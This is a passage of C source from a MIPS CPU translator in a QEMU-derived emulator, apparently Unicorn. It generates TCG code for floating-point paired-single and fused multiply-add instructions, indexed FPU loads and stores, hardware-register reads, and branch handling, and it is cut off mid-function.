tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_gpr[ft], 0, l1); fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); gen_set_label(tcg_ctx, l1); } } break; case OPC_ADDR_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, ft); gen_load_fpr64(ctx, fp1, fs); gen_helper_float_addr_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_MULR_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, ft); gen_load_fpr64(ctx, fp1, fs); gen_helper_float_mulr_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_RECIP2_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_recip2_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_RECIP1_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_recip1_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_RSQRT1_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_rsqrt1_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_RSQRT2_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_helper_float_rsqrt2_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_CVT_S_PU: check_cp1_64bitmode(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32h(ctx, fp0, fs); gen_helper_float_cvts_pu(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_CVT_PW_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_helper_float_cvtpw_ps(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_CVT_S_PL: check_cp1_64bitmode(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_helper_float_cvts_pl(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_PLL_PS: check_ps(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_store_fpr32h(ctx, fp0, fd); gen_store_fpr32(ctx, fp1, fd); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); } break; case OPC_PLU_PS: check_ps(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32h(ctx, fp1, ft); gen_store_fpr32(ctx, fp1, fd); gen_store_fpr32h(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); } break; case OPC_PUL_PS: check_ps(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32h(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_store_fpr32(ctx, fp1, fd); gen_store_fpr32h(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); } break; case OPC_PUU_PS: check_ps(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32h(ctx, fp0, fs); gen_load_fpr32h(ctx, fp1, ft); gen_store_fpr32(ctx, fp1, fd); gen_store_fpr32h(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); } break; case OPC_CMP_F_PS: case OPC_CMP_UN_PS: case OPC_CMP_EQ_PS: case OPC_CMP_UEQ_PS: case OPC_CMP_OLT_PS: case OPC_CMP_ULT_PS: case OPC_CMP_OLE_PS: case OPC_CMP_ULE_PS: case OPC_CMP_SF_PS: case OPC_CMP_NGLE_PS: case OPC_CMP_SEQ_PS: case OPC_CMP_NGL_PS: case OPC_CMP_LT_PS: case OPC_CMP_NGE_PS: case OPC_CMP_LE_PS: case OPC_CMP_NGT_PS: if (ctx->opcode & (1 << 6)) { gen_cmpabs_ps(ctx, func - 48, ft, fs, cc); } else { gen_cmp_ps(ctx, func - 48, ft, fs, cc); } break; default: MIPS_INVAL("farith"); generate_exception_end(ctx, EXCP_RI); return; } } /* Coprocessor 3 (FPU) */ static void gen_flt3_ldst(DisasContext *ctx, uint32_t opc, int fd, int fs, int base, int index) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); if (base == 0) { gen_load_gpr(tcg_ctx, t0, index); } else if (index == 0) { gen_load_gpr(tcg_ctx, t0, base); } else { gen_op_addr_add(ctx, t0, tcg_ctx->cpu_gpr[base], tcg_ctx->cpu_gpr[index]); } /* * Don't do NOP if destination is zero: we must perform the actual * memory access. */ switch (opc) { case OPC_LWXC1: check_cop1x(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TESL); tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); gen_store_fpr32(ctx, fp0, fd); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_LDXC1: check_cop1x(ctx); check_cp1_registers(ctx, fd); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEQ); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_LUXC1: check_cp1_64bitmode(ctx); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x7); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_qemu_ld_i64(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEQ); gen_store_fpr64(ctx, fp0, fd); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_SWXC1: check_cop1x(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); tcg_gen_qemu_st_i32(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEUL); tcg_temp_free_i32(tcg_ctx, fp0); } break; case OPC_SDXC1: check_cop1x(ctx); check_cp1_registers(ctx, fs); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); tcg_gen_qemu_st_i64(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEQ); tcg_temp_free_i64(tcg_ctx, fp0); } break; case OPC_SUXC1: check_cp1_64bitmode(ctx); tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x7); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); tcg_gen_qemu_st_i64(tcg_ctx, fp0, t0, ctx->mem_idx, MO_TEQ); tcg_temp_free_i64(tcg_ctx, fp0); } break; } tcg_temp_free(tcg_ctx, t0); } static void gen_flt3_arith(DisasContext *ctx, uint32_t opc, int fd, int fr, int fs, int ft) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; switch (opc) { case OPC_ALNV_PS: check_ps(ctx); { TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv_i32 fp = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fph = tcg_temp_new_i32(tcg_ctx); TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); gen_load_gpr(tcg_ctx, t0, fr); tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x7); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, 0, l1); gen_load_fpr32(ctx, fp, fs); gen_load_fpr32h(ctx, fph, fs); gen_store_fpr32(ctx, fp, fd); gen_store_fpr32h(ctx, fph, fd); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, 4, l2); tcg_temp_free(tcg_ctx, t0); #ifdef TARGET_WORDS_BIGENDIAN gen_load_fpr32(ctx, fp, fs); gen_load_fpr32h(ctx, fph, ft); gen_store_fpr32h(ctx, fp, fd); gen_store_fpr32(ctx, fph, fd); #else gen_load_fpr32h(ctx, fph, fs); gen_load_fpr32(ctx, fp, ft); gen_store_fpr32(ctx, fph, fd); gen_store_fpr32h(ctx, fp, fd); #endif gen_set_label(tcg_ctx, l2); tcg_temp_free_i32(tcg_ctx, fp); tcg_temp_free_i32(tcg_ctx, fph); } break; case OPC_MADD_S: check_cop1x(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_load_fpr32(ctx, fp2, fr); gen_helper_float_madd_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); } break; case OPC_MADD_D: check_cop1x(ctx); check_cp1_registers(ctx, fd | fs | ft | fr); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_madd_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; case OPC_MADD_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_madd_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; case OPC_MSUB_S: check_cop1x(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_load_fpr32(ctx, fp2, fr); gen_helper_float_msub_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); } break; case OPC_MSUB_D: check_cop1x(ctx); check_cp1_registers(ctx, fd | fs | ft | fr); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_msub_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; case OPC_MSUB_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_msub_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; case OPC_NMADD_S: check_cop1x(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_load_fpr32(ctx, fp2, fr); gen_helper_float_nmadd_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); } break; case OPC_NMADD_D: check_cop1x(ctx); check_cp1_registers(ctx, fd | fs | ft | fr); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_nmadd_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; case OPC_NMADD_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_nmadd_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; case OPC_NMSUB_S: check_cop1x(ctx); { TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); gen_load_fpr32(ctx, fp0, fs); gen_load_fpr32(ctx, fp1, ft); gen_load_fpr32(ctx, fp2, fr); gen_helper_float_nmsub_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i32(tcg_ctx, fp0); tcg_temp_free_i32(tcg_ctx, fp1); gen_store_fpr32(ctx, fp2, fd); tcg_temp_free_i32(tcg_ctx, fp2); } break; case OPC_NMSUB_D: check_cop1x(ctx); check_cp1_registers(ctx, fd | fs | ft | fr); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_nmsub_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; case OPC_NMSUB_PS: check_ps(ctx); { TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); gen_load_fpr64(ctx, fp0, fs); gen_load_fpr64(ctx, fp1, ft); gen_load_fpr64(ctx, fp2, fr); gen_helper_float_nmsub_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); tcg_temp_free_i64(tcg_ctx, fp0); tcg_temp_free_i64(tcg_ctx, fp1); gen_store_fpr64(ctx, fp2, fd); tcg_temp_free_i64(tcg_ctx, fp2); } break; default: MIPS_INVAL("flt3_arith"); generate_exception_end(ctx, EXCP_RI); return; } } static void gen_rdhwr(DisasContext *ctx, int rt, int rd, int sel) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; /* * The Linux kernel will emulate rdhwr if it's not supported natively. * Therefore only check the ISA in system mode. */ check_insn(ctx, ISA_MIPS32R2); t0 = tcg_temp_new(tcg_ctx); switch (rd) { case 0: gen_helper_rdhwr_cpunum(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); break; case 1: gen_helper_rdhwr_synci_step(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); break; case 2: if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_rdhwr_cc(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); /* * Break the TB to be able to take timer interrupts immediately * after reading count. DISAS_STOP isn't sufficient, we need to ensure * we break completely out of translated code. */ gen_save_pc(tcg_ctx, ctx->base.pc_next + 4); ctx->base.is_jmp = DISAS_EXIT; break; case 3: gen_helper_rdhwr_ccres(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); break; case 4: check_insn(ctx, ISA_MIPS32R6); if (sel != 0) { /* * Performance counter registers are not implemented other than * control register 0. */ generate_exception(ctx, EXCP_RI); } gen_helper_rdhwr_performance(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); break; case 5: check_insn(ctx, ISA_MIPS32R6); gen_helper_rdhwr_xnp(tcg_ctx, t0, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, t0, rt); break; case 29: if ((ctx->hflags & MIPS_HFLAG_CP0) || (ctx->hflags & MIPS_HFLAG_HWRENA_ULR)) { tcg_gen_ld_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); gen_store_gpr(tcg_ctx, t0, rt); } else { generate_exception_end(ctx, EXCP_RI); } break; default: /* Invalid */ MIPS_INVAL("rdhwr"); generate_exception_end(ctx, EXCP_RI); break; } tcg_temp_free(tcg_ctx, t0); } static inline void clear_branch_hflags(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; ctx->hflags &= ~MIPS_HFLAG_BMASK; if (ctx->base.is_jmp == DISAS_NEXT) { save_cpu_state(ctx, 0); } else { /* * It is not safe to save ctx->hflags as hflags may be changed * in execution time by the instruction in delay / forbidden slot. */ tcg_gen_andi_i32(tcg_ctx, tcg_ctx->hflags, tcg_ctx->hflags, ~MIPS_HFLAG_BMASK); } } static void gen_branch(DisasContext *ctx, int insn_bytes) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (ctx->hflags & MIPS_HFLAG_BMASK) { int proc_hflags = ctx->hflags & MIPS_HFLAG_BMASK; /* Branches completion */ clear_branch_hflags(ctx); ctx->base.is_jmp = DISAS_NORETURN; /* FIXME: Need to clear can_do_io. */ switch (proc_hflags & MIPS_HFLAG_BMASK_BASE) { case MIPS_HFLAG_FBNSLOT: gen_goto_tb(ctx, 0, ctx->base.pc_next + insn_bytes); break; case MIPS_HFLAG_B: /* unconditional branch */ if (proc_hflags & MIPS_HFLAG_BX) { tcg_gen_xori_i32(tcg_ctx, tcg_ctx->hflags, tcg_ctx->hflags, MIPS_HFLAG_M16); } gen_goto_tb(ctx, 0, ctx->btarget); break; case MIPS_HFLAG_BL: /* blikely taken case */ gen_goto_tb(ctx, 0, ctx->btarget); break; case MIPS_HFLAG_BC: /* Conditional branch */ { TCGLabel *l1 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, tcg_ctx->bcond, 0, l1); gen_goto_tb(ctx, 1, ctx->base.pc_next + insn_bytes); gen_set_label(tcg_ctx, l1); gen_goto_tb(ctx, 0, ctx->btarget); } break; case MIPS_HFLAG_BR: /* unconditional branch to register */ if (ctx->insn_flags & (ASE_MIPS16 | ASE_MICROMIPS)) { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, tcg_ctx->btarget, 0x1); tcg_gen_trunc_tl_i32(tcg_ctx, t1, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_andi_i32(tcg_ctx, tcg_ctx->hflags, tcg_ctx->hflags, ~(uint32_t)MIPS_HFLAG_M16); tcg_gen_shli_i32(tcg_ctx, t1, t1, MIPS_HFLAG_M16_SHIFT); tcg_gen_or_i32(tcg_ctx, tcg_ctx->hflags, tcg_ctx->hflags, t1); tcg_temp_free_i32(tcg_ctx, t1); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->btarget, ~(target_ulong)0x1); } else { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_pc, tcg_ctx->btarget); } if (ctx->base.singlestep_enabled) { save_cpu_state(ctx, 0); gen_helper_raise_exception_debug(tcg_ctx, tcg_ctx->cpu_env); } tcg_gen_lookup_and_goto_ptr(tcg_ctx); break; default: fprintf(stderr, "unknown branch 0x%x\n", proc_hflags); abort(); } } } /* Compact Branches */ static void gen_compute_compact_branch(DisasContext *ctx, uint32_t opc, int rs, int rt, int32_t offset) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int bcond_compute = 0; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); int m16_lowbit = (ctx->hflags & MIPS_HFLAG_M16) != 0; if (ctx->hflags & MIPS_HFLAG_BMASK) { #ifdef MIPS_DEBUG_DISAS LOG_DISAS("Branch in delay / forbidden slot at PC 0x" TARGET_FMT_lx "\n", ctx->base.pc_next); #endif generate_exception_end(ctx, EXCP_RI); goto out; } /* Load needed operands and calculate btarget */ switch (opc) { /* compact branch */ case OPC_BOVC: /* OPC_BEQZALC, OPC_BEQC */ case OPC_BNVC: /* OPC_BNEZALC, OPC_BNEC */ gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); bcond_compute = 1; ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); if (rs <= rt && rs == 0) { /* OPC_BEQZALC, OPC_BNEZALC */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + 4 + m16_lowbit); } break; case OPC_BLEZC: /* OPC_BGEZC, OPC_BGEC */ case OPC_BGTZC: /* OPC_BLTZC, OPC_BLTC */ gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); bcond_compute = 1; ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); break; case OPC_BLEZALC: /* OPC_BGEZALC, OPC_BGEUC */ case OPC_BGTZALC: /* OPC_BLTZALC, OPC_BLTUC */ if (rs == 0 || rs == rt) { /* OPC_BLEZALC, OPC_BGEZALC */ /* OPC_BGTZALC, OPC_BLTZALC */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + 4 + m16_lowbit); } gen_load_gpr(tcg_ctx, t0, rs); gen_load_gpr(tcg_ctx, t1, rt); bcond_compute = 1; ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); break; case OPC_BC: case OPC_BALC: ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); break; case OPC_BEQZC: case OPC_BNEZC: if (rs != 0) { /* OPC_BEQZC, OPC_BNEZC */ gen_load_gpr(tcg_ctx, t0, rs); bcond_compute = 1; ctx->btarget = addr_add(ctx, ctx->base.pc_next + 4, offset); } else { /* OPC_JIC, OPC_JIALC */ TCGv tbase = tcg_temp_new(tcg_ctx); TCGv toffset = tcg_temp_new(tcg_ctx); gen_load_gpr(tcg_ctx, tbase, rt); tcg_gen_movi_tl(tcg_ctx, toffset, offset); gen_op_addr_add(ctx, tcg_ctx->btarget, tbase, toffset); tcg_temp_free(tcg_ctx, tbase); tcg_temp_free(tcg_ctx, toffset); } break; default: MIPS_INVAL("Compact branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } if (bcond_compute == 0) { /* Uncoditional compact branch */ switch (opc) { case OPC_JIALC: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + 4 + m16_lowbit); /* Fallthrough */ case OPC_JIC: ctx->hflags |= MIPS_HFLAG_BR; break; case OPC_BALC: tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[31], ctx->base.pc_next + 4 + m16_lowbit); /* Fallthrough */ case OPC_BC: ctx->hflags |= MIPS_HFLAG_B; break; default: MIPS_INVAL("Compact branch/jump"); generate_exception_end(ctx, EXCP_RI); goto out; } /* Generating branch here as compact branches don't have delay slot */ gen_branch(ctx, 4); } else { /* Conditional compact branch */ TCGLabel *fs = gen_new_label(tcg_ctx); save_cpu_state(ctx, 0); switch (opc) { case OPC_BLEZALC: /* OPC_BGEZALC, OPC_BGEUC */ if (rs == 0 && rt != 0) { /* OPC_BLEZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LE), t1, 0, fs); } else if (rs != 0 && rt != 0 && rs == rt) { /* OPC_BGEZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE), t1, 0, fs); } else { /* OPC_BGEUC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GEU), t0, t1, fs); } break; case OPC_BGTZALC: /* OPC_BLTZALC, OPC_BLTUC */ if (rs == 0 && rt != 0) { /* OPC_BGTZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GT), t1, 0, fs); } else if (rs != 0 && rt != 0 && rs == rt) { /* OPC_BLTZALC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LT), t1, 0, fs); } else { /* OPC_BLTUC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LTU), t0, t1, fs); } break; case OPC_BLEZC: /* OPC_BGEZC, OPC_BGEC */ if (rs == 0 && rt != 0) { /* OPC_BLEZC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_LE), t1, 0, fs); } else if (rs != 0 && rt != 0 && rs == rt) { /* OPC_BGEZC */ tcg_gen_brcondi_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE), t1, 0, fs); } else { /* OPC_BGEC */ tcg_gen_brcond_tl(tcg_ctx, tcg_invert_cond(TCG_COND_GE), t0, t1, fs); } break; case OPC_BGTZC: /* OPC_BLTZC, 